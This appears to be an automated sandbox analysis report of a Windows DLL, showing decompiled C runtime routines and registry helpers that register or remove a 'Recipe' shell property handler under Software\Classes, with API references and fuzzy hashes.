                                          0x100077ae
                                          0x100077b1
                                          0x100077b7
                                          0x100077ba
                                          0x100077bd
                                          0x100077c0
                                          0x100077c3
                                          0x100077c3
                                          0x100077ce
                                          0x100077d9
                                          0x10007908
                                          0x10007908
                                          0x10007908
                                          0x1000790e
                                          0x00000000
                                          0x00000000
                                          0x10007919
                                          0x1000791f
                                          0x10007925
                                          0x1000793a
                                          0x10007940
                                          0x10007947
                                          0x1000794c
                                          0x1000794e
                                          0x10007942
                                          0x10007944
                                          0x10007944
                                          0x10007958
                                          0x1000795d
                                          0x100079a4
                                          0x100079aa
                                          0x100079ad
                                          0x100079b3
                                          0x100079ba
                                          0x100079bf
                                          0x100079bf
                                          0x00000000
                                          0x10007963
                                          0x10007964
                                          0x1000796c
                                          0x00000000
                                          0x00000000
                                          0x1000796e
                                          0x10007970
                                          0x10007978
                                          0x10007985
                                          0x10007990
                                          0x10007995
                                          0x10007999
                                          0x1000799f
                                          0x00000000
                                          0x1000799f
                                          0x1000798b
                                          0x1000798d
                                          0x1000798d
                                          0x00000000
                                          0x1000798d
                                          0x1000797e
                                          0x00000000
                                          0x1000797e
                                          0x1000792c
                                          0x10007932
                                          0x100079c6
                                          0x100079c6
                                          0x00000000
                                          0x100079c6
                                          0x10007925
                                          0x100079cc
                                          0x100079d3
                                          0x1000774d
                                          0x1000774f
                                          0x10007750
                                          0x10007755
                                          0x10007755
                                          0x100077df
                                          0x100077e4
                                          0x00000000
                                          0x00000000
                                          0x100077ea
                                          0x100077ec
                                          0x100077ef
                                          0x100077f2
                                          0x100077f7
                                          0x10007801
                                          0x10007803
                                          0x10007805
                                          0x10007805
                                          0x1000780a
                                          0x1000780b
                                          0x1000780e
                                          0x10007820
                                          0x10007822
                                          0x10007827
                                          0x100078bb
                                          0x100078c2
                                          0x100078c8
                                          0x100078d8
                                          0x100078de
                                          0x100078e1
                                          0x100078e4
                                          0x100078e8
                                          0x100078ee
                                          0x100078f1
                                          0x100078f4
                                          0x100078f7
                                          0x100078f7
                                          0x100078fc
                                          0x100078fd
                                          0x10007900
                                          0x00000000
                                          0x10007900
                                          0x1000782d
                                          0x10007833
                                          0x00000000
                                          0x10007833
                                          0x10007836
                                          0x10007838
                                          0x1000783b
                                          0x1000783e
                                          0x10007841
                                          0x10007849
                                          0x1000784e
                                          0x100078a8
                                          0x100078a8
                                          0x100078a9
                                          0x100078af
                                          0x100078b0
                                          0x100078b3
                                          0x100078b6
                                          0x00000000
                                          0x10007855
                                          0x10007855
                                          0x10007859
                                          0x00000000
                                          0x00000000
                                          0x1000785d
                                          0x1000786d
                                          0x1000787a
                                          0x10007881
                                          0x10007886
                                          0x1000788d
                                          0x10007895
                                          0x10007899
                                          0x1000789f
                                          0x100078a2
                                          0x100078a5
                                          0x100078a5
                                          0x00000000
                                          0x100078a5
                                          0x10007860
                                          0x10007866
                                          0x1000786b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x1000786b
                                          0x1000784e
                                          0x00000000
                                          0x10007841
                                          0x10007779
                                          0x10007781
                                          0x00000000
                                          0x10007781
                                          0x10007745
                                          0x00000000

                                          APIs
                                          • __lock.LIBCMT ref: 10007727
                                            • Part of subcall function 100091AB: __mtinitlocknum.LIBCMT ref: 100091BD
                                            • Part of subcall function 100091AB: __amsg_exit.LIBCMT ref: 100091C9
                                            • Part of subcall function 100091AB: EnterCriticalSection.KERNEL32(10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100091D6
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 10007745
                                          • __calloc_crt.LIBCMT ref: 1000775E
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 10007779
                                          • GetStartupInfoW.KERNEL32(?,10010D68,00000064), ref: 100077CE
                                          • __calloc_crt.LIBCMT ref: 10007819
                                          • GetFileType.KERNEL32 ref: 10007860
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10007899
                                          • GetStdHandle.KERNEL32(-000000F6), ref: 10007952
                                          • GetFileType.KERNEL32 ref: 10007964
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(-10014C74,00000FA0), ref: 10007999
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                          • String ID:
                                          • API String ID: 301580142-0
                                          • Opcode ID: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
                                          • Instruction ID: 674899b519222b2de9a2fae7d59f7574afda57542dcf9298ac8c6c73304dea21
                                          • Opcode Fuzzy Hash: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
                                          • Instruction Fuzzy Hash: 6391D370D053569FEB10CF68C88059DBBF0FF462A0B25826DD4AAA73E5DB38D842CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10003400, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85registrystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 55%
                                          			E10003400(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				int _t26;
				wchar_t* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				void* _t40;
				WCHAR* _t41;
				short _t42;
				signed int _t44;
				void* _t48;
				short _t52;

				_t20 =  *0x10012158; // 0x8bc2c1c1
				_v8 = _t20 ^ _t44;
				_t37 = _a8;
				_v1036 = _a4;
				_t41 = _a12;
				_v1040 = _a16;
				_t42 = 0;
				_t26 = vswprintf( &_v1032, 0x1ff, _t41,  &_a24);
				if(_t26 < 0) {
					L4:
					_t42 = 0x8007007a;
					goto L5;
				} else {
					_t48 = _t26 - 0x1ff;
					if(_t48 > 0) {
						goto L4;
					} else {
						if(_t48 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t42 >= 0) {
					_t32 =  &_v1032;
					__imp__RegSetKeyValueW(_t37, _t32, _v1040, 1, _a20, lstrlenW(_a20) + _t30);
					_t42 = _t32;
					if(_t42 > 0) {
						_t52 = _t42;
					}
					if(_t52 >= 0) {
						_t33 = _v1036;
						if( *((char*)(_t33 + 0x26a)) == 0) {
							__imp__#154(_t41, L"Software\\Classes\\%s", 0x13);
							if(_t33 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t37 = StrStrIW;
								if(StrStrIW(_t41, L"PropertyHandlers") != 0 || StrStrIW(_t41, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t37, _v8 ^ _t44, _t40, _t41, _t42);
			}






















                                          0x10003409
                                          0x10003410
                                          0x10003417
                                          0x1000341b
                                          0x10003425
                                          0x10003428
                                          0x1000343f
                                          0x10003441
                                          0x1000344b
                                          0x10003458
                                          0x10003458
                                          0x00000000
                                          0x1000344d
                                          0x1000344d
                                          0x10003452
                                          0x00000000
                                          0x10003454
                                          0x10003454
                                          0x1000345d
                                          0x1000345f
                                          0x1000345f
                                          0x10003454
                                          0x10003452
                                          0x10003465
                                          0x1000347a
                                          0x1000348a
                                          0x10003490
                                          0x10003494
                                          0x1000349f
                                          0x1000349f
                                          0x100034a1
                                          0x100034a3
                                          0x100034b0
                                          0x100034ba
                                          0x100034c2
                                          0x100034e2
                                          0x100034e8
                                          0x100034c4
                                          0x100034c4
                                          0x100034d4
                                          0x00000000
                                          0x00000000
                                          0x100034d4
                                          0x100034c2
                                          0x100034b0
                                          0x100034a1
                                          0x10003501

                                          APIs
                                          • vswprintf.LIBCMT ref: 10003441
                                            • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                          • lstrlenW.KERNEL32(1000D260,?,?,?,?), ref: 1000346E
                                          • RegSetKeyValueW.ADVAPI32(?,?,?,00000001,1000D260,00000000), ref: 1000348A
                                          • StrCmpNICW.SHLWAPI(8BC2C1C1,Software\Classes\%s,00000013), ref: 100034BA
                                          • StrStrIW.SHLWAPI(8BC2C1C1,PropertyHandlers), ref: 100034D0
                                          • StrStrIW.SHLWAPI(8BC2C1C1,KindMap), ref: 100034DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Value__vsnwprintf_llstrlenvswprintf
                                          • String ID: KindMap$PropertyHandlers$Software\Classes\%s
                                          • API String ID: 1581644826-984809517
                                          • Opcode ID: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
                                          • Instruction ID: d850e188dbc6640e840f0cd68e96ba4cbad68a3ac590cffcf769bc7201be35e9
                                          • Opcode Fuzzy Hash: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
                                          • Instruction Fuzzy Hash: B52185B5A00229ABE712DF68CC80BAF77ACEF04790F0180A5FB04FB145D635ED418BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10003510, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 83registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 49%
                                          			E10003510(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, char _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				int _t25;
				wchar_t* _t30;
				intOrPtr _t31;
				intOrPtr _t35;
				void* _t38;
				WCHAR* _t39;
				short _t40;
				signed int _t42;
				void* _t46;
				short _t50;

				_t19 =  *0x10012158; // 0x8bc2c1c1
				_v8 = _t19 ^ _t42;
				_t35 = _a8;
				_v1036 = _a4;
				_t39 = _a12;
				_v1040 = _a16;
				_t40 = 0;
				_t25 = vswprintf( &_v1032, 0x1ff, _t39,  &_a24);
				if(_t25 < 0) {
					L4:
					_t40 = 0x8007007a;
					goto L5;
				} else {
					_t46 = _t25 - 0x1ff;
					if(_t46 > 0) {
						goto L4;
					} else {
						if(_t46 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t40 >= 0) {
					_t30 =  &_v1032;
					__imp__RegSetKeyValueW(_t35, _t30, _v1040, 4,  &_a20, 4);
					_t40 = _t30;
					if(_t40 > 0) {
						_t50 = _t40;
					}
					if(_t50 >= 0) {
						_t31 = _v1036;
						if( *((char*)(_t31 + 0x26a)) == 0) {
							__imp__#154(_t39, L"Software\\Classes\\%s", 0x13);
							if(_t31 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t35 = StrStrIW;
								if(StrStrIW(_t39, L"PropertyHandlers") != 0 || StrStrIW(_t39, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t35, _v8 ^ _t42, _t38, _t39, _t40);
			}






















                                          0x10003519
                                          0x10003520
                                          0x10003527
                                          0x1000352b
                                          0x10003535
                                          0x10003538
                                          0x1000354f
                                          0x10003551
                                          0x1000355b
                                          0x10003568
                                          0x10003568
                                          0x00000000
                                          0x1000355d
                                          0x1000355d
                                          0x10003562
                                          0x00000000
                                          0x10003564
                                          0x10003564
                                          0x1000356d
                                          0x1000356f
                                          0x1000356f
                                          0x10003564
                                          0x10003562
                                          0x10003575
                                          0x10003585
                                          0x1000358d
                                          0x10003593
                                          0x10003597
                                          0x100035a2
                                          0x100035a2
                                          0x100035a4
                                          0x100035a6
                                          0x100035b3
                                          0x100035bd
                                          0x100035c5
                                          0x100035e5
                                          0x100035eb
                                          0x100035c7
                                          0x100035c7
                                          0x100035d7
                                          0x00000000
                                          0x00000000
                                          0x100035d7
                                          0x100035c5
                                          0x100035b3
                                          0x100035a4
                                          0x10003604

                                          APIs
                                          • vswprintf.LIBCMT ref: 10003551
                                            • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                          • RegSetKeyValueW.ADVAPI32(?,?,?,00000004,1000D260,00000004), ref: 1000358D
                                          • StrCmpNICW.SHLWAPI(8BC2C1C1,Software\Classes\%s,00000013), ref: 100035BD
                                          • StrStrIW.SHLWAPI(8BC2C1C1,PropertyHandlers), ref: 100035D3
                                          • StrStrIW.SHLWAPI(8BC2C1C1,KindMap), ref: 100035DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Value__vsnwprintf_lvswprintf
                                          • String ID: KindMap$PropertyHandlers$Recipe (.recipe) Property Handler$Software\Classes\%s
                                          • API String ID: 396321892-1357300599
                                          • Opcode ID: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
                                          • Instruction ID: 39f9389b0fe208d6d553e4c758c28d4d041f374c8ead2d52af9196b7918bc5e1
                                          • Opcode Fuzzy Hash: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
                                          • Instruction Fuzzy Hash: F321B4B5A0062AABE711CB588C81BDB77ECDF04791F0181A5EB04F7255D630DE418BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10003310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 76registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 49%
                                          			E10003310(intOrPtr _a4, intOrPtr _a8, wchar_t* _a12, void _a16) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				void* _t24;
				intOrPtr _t26;
				signed short _t30;
				void* _t31;
				void* _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed short _t37;
				signed int _t40;
				void* _t44;

				_t16 =  *0x10012158; // 0x8bc2c1c1
				_v8 = _t16 ^ _t40;
				_t35 = _a8;
				_v1036 = _a4;
				_t37 = 0;
				_t21 = vswprintf( &_v1032, 0x1ff, _a12,  &_a16);
				if(_t21 < 0) {
					L4:
					_t37 = 0x8007007a;
					L5:
					_v10 = 0;
					L6:
					if(_t37 >= 0) {
						_t30 =  &_v1032;
						__imp__RegDeleteTreeW(_t35, _t30);
						_t37 = _t30;
						if(_t37 > 0) {
							_t37 = _t37 & 0x0000ffff | 0x80070000;
						}
					}
					_t36 = _a12;
					if(_t37 >= 0) {
						_t26 = _v1036;
						if( *((char*)(_t26 + 0x26a)) == 0) {
							__imp__#154(_t36, L"Software\\Classes\\%s", 0x13);
							if(_t26 == 0 || StrStrIW(_t36, L"PropertyHandlers") != 0 || StrStrIW(_t36, L"KindMap") != 0) {
								 *((char*)(_v1036 + 0x26a)) = 1;
							}
						}
					}
					_t38 =  ==  ? 0 : _t37;
					_t24 =  ==  ? 0 : _t37;
					return E10003850(_t31, _v8 ^ _t40, _t34, _t36,  ==  ? 0 : _t37);
				}
				_t44 = _t21 - 0x1ff;
				if(_t44 > 0) {
					goto L4;
				}
				if(_t44 != 0) {
					goto L6;
				} else {
					goto L5;
				}
			}





















                                          0x10003319
                                          0x10003320
                                          0x10003328
                                          0x1000332b
                                          0x10003344
                                          0x10003346
                                          0x10003350
                                          0x1000335d
                                          0x1000335d
                                          0x10003362
                                          0x10003364
                                          0x10003368
                                          0x1000336a
                                          0x1000336c
                                          0x10003374
                                          0x1000337a
                                          0x1000337e
                                          0x10003383
                                          0x10003383
                                          0x1000337e
                                          0x10003389
                                          0x1000338e
                                          0x10003390
                                          0x1000339d
                                          0x100033a7
                                          0x100033af
                                          0x100033d7
                                          0x100033d7
                                          0x100033af
                                          0x1000339d
                                          0x100033e9
                                          0x100033ed
                                          0x100033fa
                                          0x100033fa
                                          0x10003352
                                          0x10003357
                                          0x00000000
                                          0x00000000
                                          0x10003359
                                          0x00000000
                                          0x1000335b
                                          0x00000000
                                          0x1000335b

                                          APIs
                                          • vswprintf.LIBCMT ref: 10003346
                                            • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                          • RegDeleteTreeW.ADVAPI32(80000002,?,?,?,80000016,80000002), ref: 10003374
                                          • StrCmpNICW.SHLWAPI(1000D260,Software\Classes\%s,00000013), ref: 100033A7
                                          • StrStrIW.SHLWAPI(1000D260,PropertyHandlers), ref: 100033B7
                                          • StrStrIW.SHLWAPI(1000D260,KindMap), ref: 100033C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: DeleteTree__vsnwprintf_lvswprintf
                                          • String ID: KindMap$PropertyHandlers$Software\Classes\%s
                                          • API String ID: 1945471109-984809517
                                          • Opcode ID: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
                                          • Instruction ID: 9a12c5af6921165393e350ba5b5d3422aefee07d893388e2def3c676086b3e3f
                                          • Opcode Fuzzy Hash: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
                                          • Instruction Fuzzy Hash: 40219571A00229ABE712DB658C84BAF7BACEF05790F0180A9EA44F7144DF34DE4187A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1000CB53, Relevance: 13.6, APIs: 9, Instructions: 66COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E1000CB53(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E100076DE(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E1000C21F(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x10014c80;
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E1000C21F(2);
							if(E1000C21F(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E1000C21F(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E1000C199(_t35);
					 *((char*)( *((intOrPtr*)(0x10014c80 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E10005EA5(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}










                                          0x1000cb56
                                          0x1000cb5d
                                          0x1000cb66
                                          0x1000cb73
                                          0x1000cbc5
                                          0x1000cbc5
                                          0x1000cb75
                                          0x1000cb75
                                          0x1000cb7d
                                          0x1000cb8b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x1000cb93
                                          0x1000cb93
                                          0x1000cb95
                                          0x1000cba7
                                          0x00000000
                                          0x1000cba9
                                          0x1000cba9
                                          0x1000cbb9
                                          0x00000000
                                          0x1000cbbb
                                          0x1000cbc1
                                          0x1000cbc1
                                          0x1000cbb9
                                          0x1000cba7
                                          0x1000cb7d
                                          0x1000cbc8
                                          0x1000cbe0
                                          0x1000cbe7
                                          0x1000cbf5
                                          0x1000cbe9
                                          0x1000cbf0
                                          0x1000cbf0
                                          0x1000cbfa
                                          0x1000cb5f
                                          0x1000cb63
                                          0x1000cb63

                                          APIs
                                          • __ioinit.LIBCMT ref: 1000CB56
                                            • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                          • __get_osfhandle.LIBCMT ref: 1000CB6A
                                          • __get_osfhandle.LIBCMT ref: 1000CB95
                                          • __get_osfhandle.LIBCMT ref: 1000CB9E
                                          • __get_osfhandle.LIBCMT ref: 1000CBAA
                                          • CloseHandle.KERNEL32(00000000), ref: 1000CBB1
                                          • GetLastError.KERNEL32(?,1000CAFE,?,10010F70,00000010,1000C8AF,00000000,?,?,?), ref: 1000CBBB
                                          • __free_osfhnd.LIBCMT ref: 1000CBC8
                                          • __dosmaperr.LIBCMT ref: 1000CBEA
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                          • String ID:
                                          • API String ID: 974577687-0
                                          • Opcode ID: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
                                          • Instruction ID: 4dcb91801efe7e8802ed07738d4b4d51631a97aa082ad4716e798bfbc08581c5
                                          • Opcode Fuzzy Hash: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
                                          • Instruction Fuzzy Hash: 6D112532A0136806F220D3B4AD86F6E3788CB81AF4F260259F92C9B1DAEF25E8424150
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002A10, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 146COMMON
                                          Download Yara Rule
                                          APIs
                                          • PSPropertyKeyFromString.PROPSYS(?,1000D358), ref: 10002AE7
                                          • VariantClear.OLEAUT32(?), ref: 10002B69
                                            • Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
                                            • Part of subcall function 100021F0: CoTaskMemAlloc.OLE32(?), ref: 10002227
                                            • Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
                                            • Part of subcall function 100021F0: StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
                                            • Part of subcall function 100021F0: CoTaskMemFree.OLE32(00000000), ref: 1000227A
                                          • PropVariantClear.OLE32(?), ref: 10002B59
                                          • VariantClear.OLEAUT32(?), ref: 10002B63
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Variant$ClearString$BinaryCryptPropTask$AllocDeserializeFreeFromProperty
                                          • String ID: EncodedValue$Key$Recipe/ExtendedProperties/Property
                                          • API String ID: 3673094071-3396277477
                                          • Opcode ID: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
                                          • Instruction ID: 3dad86e6d28e45b22825a59d90f277ab18ae42466b94d84f5f8411af20a881c7
                                          • Opcode Fuzzy Hash: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
                                          • Instruction Fuzzy Hash: 1D510A71D0061A9FDB11DFE4C884ADEB7B9EF8D350B118259E905EB214EB35AD42CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 100061BA, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E100061BA(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E1000750E(_t3);
				if(E100092DA() != 0) {
					_t6 = E10007E6B(_t5, E10005F1A);
					 *0x10012310 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E10007F1D(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E10006230();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E10007E95(_t9,  *0x10012310, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E1000610E(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E10006230();
					return 0;
				}
			}








                                          0x100061ba
                                          0x100061c6
                                          0x100061d5
                                          0x100061db
                                          0x100061e0
                                          0x100061e3
                                          0x00000000
                                          0x100061e5
                                          0x100061f2
                                          0x100061f6
                                          0x100061f8
                                          0x10006227
                                          0x10006227
                                          0x1000622c
                                          0x1000622f
                                          0x100061fa
                                          0x10006208
                                          0x1000620a
                                          0x00000000
                                          0x1000620c
                                          0x1000620c
                                          0x1000620e
                                          0x1000620f
                                          0x10006216
                                          0x1000621c
                                          0x10006220
                                          0x10006224
                                          0x10006226
                                          0x10006226
                                          0x1000620a
                                          0x100061f8
                                          0x100061c8
                                          0x100061c8
                                          0x100061c8
                                          0x100061cf
                                          0x100061cf

                                          APIs
                                          • __init_pointers.LIBCMT ref: 100061BA
                                            • Part of subcall function 1000750E: EncodePointer.KERNEL32(00000000,00000001,100061BF,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10007511
                                            • Part of subcall function 1000750E: __initp_misc_winsig.LIBCMT ref: 10007532
                                          • __mtinitlocks.LIBCMT ref: 100061BF
                                            • Part of subcall function 100092DA: InitializeCriticalSectionAndSpinCount.KERNEL32(10012AF0,00000FA0,?,00000001,100061C4,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100092F8
                                          • __mtterm.LIBCMT ref: 100061C8
                                            • Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(?,?,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100091F6
                                            • Part of subcall function 10006230: _free.LIBCMT ref: 100091FD
                                            • Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(10012AF0,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001), ref: 1000921F
                                          • __calloc_crt.LIBCMT ref: 100061ED
                                          • __initptd.LIBCMT ref: 1000620F
                                          • GetCurrentThreadId.KERNEL32(10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10006216
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                          • String ID:
                                          • API String ID: 757573777-0
                                          • Opcode ID: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
                                          • Instruction ID: e938656deda60742f1fefc21b0672a3c59c014a575f1141aa0bdfd656c9da876
                                          • Opcode Fuzzy Hash: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
                                          • Instruction Fuzzy Hash: 3CF0BB76519B2229F654E7347C0369A3AC5DF097F1F300A26F464D50DDEF14E4518150
                                          Uniqueness

                                          Uniqueness Score: -1.00%

